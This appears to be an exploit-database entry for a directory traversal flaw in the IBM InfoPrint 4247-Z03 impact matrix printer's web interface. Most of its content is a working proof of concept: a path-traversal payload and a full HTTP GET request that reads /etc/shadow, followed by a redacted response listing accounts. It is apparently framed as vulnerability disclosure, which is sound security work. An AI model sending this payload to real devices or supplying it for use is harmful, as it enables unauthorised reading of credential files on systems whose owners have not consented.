IBM InfoPrint 4247-Z03 Impact Matrix Printer Directory Traversal

2020.01.01

Credit: Raif Berkay Dincel

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-22

# Exploit Title: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
# Date: 2020-01-01
# Exploit Author: Raif Berkay Dincel
# Vendor Homepage: ibm.com
# Software https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?subtype=ca&infotype=an&appname=iSource&supplier=897&letternum=ENUS107-295
# Version: 1.11
# CVE-ID: N/A
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2019/06/10
# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/[Payload]
# Proof of Concepts:
TARGET/./../../../../../../../../../../etc/shadow
# Request:
GET /./../../../../../../../../../../etc/shadow HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Connection: close
# Response:
root:::XXXXX
www-data:::XXXXX
nobody:::XXXXX
default:::XXXXX

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

IBM InfoPrint 4247-Z03 Impact Matrix Printer Directory Traversal

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.